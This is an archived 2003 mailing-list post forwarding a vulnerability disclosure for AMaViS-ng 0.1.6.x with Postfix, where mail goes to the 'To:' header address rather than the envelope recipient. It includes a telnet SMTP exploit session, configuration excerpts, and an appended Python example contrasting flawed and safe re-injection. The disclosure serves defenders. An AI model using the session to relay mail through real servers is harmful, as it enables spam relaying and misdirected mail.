AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss (fwd)

Raymond Dijkxhoorn raymond at PROLOCATION.NET
Tue Apr 8 17:59:01 IST 2003


Naturally nobody on the list uses Amavis anymore <cough cough> but just in
case you see it happening:

---------- Forwarded message ----------
Date: Mon, 7 Apr 2003 14:23:47 +0200
From: Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1 at>
Subject: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss

Hi everyone -

with postfix using AMaViS-ng 0.1.6.x (tested: and; 0.1.4.x is
not vulnerable), all email gets forwarded to the address specified by the
"To:" header line, ignoring the real recipient given via "RCPT TO:".

Possible exploit:
#> telnet somemx.domain.tld 25
(220 somemx.domain.tld ESMTP Postfix)
helo amavis-ng
(250 somemx.domain.tld)
mail from:userX at domainX.tld
(250 ok)
rcpt to:userY at domain.tld
(250 ok)
(354 End data with <CR><LF>.<CR><LF>)
From: userX at domainX.tld
To: userZ at domainZ.tld
Subject: AMaViS-ng 0.1.6.x bug
(250 Ok: queued as ...)
(221 Bye)

Requirements: The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x
installed must accept emails for userY at domain.tld.

What it does:
userX at domainX.tld is sending an email to userY at domain.tld. The header of this
email contains "To: userZ at domain.tld". AMaViS-ng seems to parse the header
and forwards the email to userZ at domain.tld. userY at domain.tld does not get
this email.
As many postfix users trust their localhost (no restrictions for localhost),
it is possible to relay an email or a spam mail this way.

configuration files (relevant parts):

# $postfix/
smtp inet n - n - - smtpd -o content_filter=filter:
filter unix - n n - - pipe
  flags=Rq user=mail argv=/usr/bin/amavis ${sender} -- ${recipient}
# end of

# $amavis-ng/amavis.conf
mail-transfer-agent = Postfix

postfix = /usr/sbin/sendmail
args = -i -f
# end of amavis.conf

There is no problem with AMaViS == 0.1.4.x

Kind regards,

Phil Cyc
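
The recipient mix-up reported above, as an added example (not part of the original post and not AMaViS-ng code): a content filter must re-inject mail to the envelope recipients that Postfix passes as ${recipient}, never to addresses parsed from the headers. The function names are hypothetical, the sample message is constructed from the transcript's addresses, and the flawed function only models the reported behaviour.

```python
from email import message_from_string
from email.utils import getaddresses

SENDMAIL = "/usr/sbin/sendmail"  # path taken from the amavis.conf quoted above

# Constructed sample: the transcript's message as the filter would receive it.
RAW = (
    "From: userX@domainX.tld\r\n"
    "To: userZ@domainZ.tld\r\n"
    "Subject: AMaViS-ng 0.1.6.x bug\r\n"
    "\r\n"
    "body\r\n"
)
ENVELOPE_SENDER = "userX@domainX.tld"
ENVELOPE_RCPTS = ["userY@domain.tld"]  # what Postfix passes as ${recipient}


def header_recipients(raw):
    """Addresses named in To:/Cc: headers (sender-controlled text)."""
    msg = message_from_string(raw)
    fields = msg.get_all("To", []) + msg.get_all("Cc", [])
    return [addr for _name, addr in getaddresses(fields) if addr]


def reinject_argv_flawed(sender, raw):
    """Model of the reported behaviour: recipients come from the headers."""
    return [SENDMAIL, "-i", "-f", sender, "--"] + header_recipients(raw)


def reinject_argv_safe(sender, envelope_rcpts):
    """Recipients come only from the SMTP envelope; headers are never read."""
    if not envelope_rcpts:
        raise ValueError("no envelope recipients; refusing to re-inject")
    for rcpt in envelope_rcpts:
        if rcpt.startswith("-") or any(c in rcpt for c in "\r\n \t"):
            raise ValueError("unsafe recipient: %r" % rcpt)
    return [SENDMAIL, "-i", "-f", sender, "--"] + list(envelope_rcpts)


def recipient_drift(argv, envelope_rcpts):
    """Recipients in a re-injection command that were not in the envelope."""
    rcpts = argv[argv.index("--") + 1:]
    allowed = {r.lower() for r in envelope_rcpts}
    return [r for r in rcpts if r.lower() not in allowed]
```

A non-empty result from recipient_drift() means the filter would deliver to an address the SMTP client never named in RCPT TO, which is the condition described in the report.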
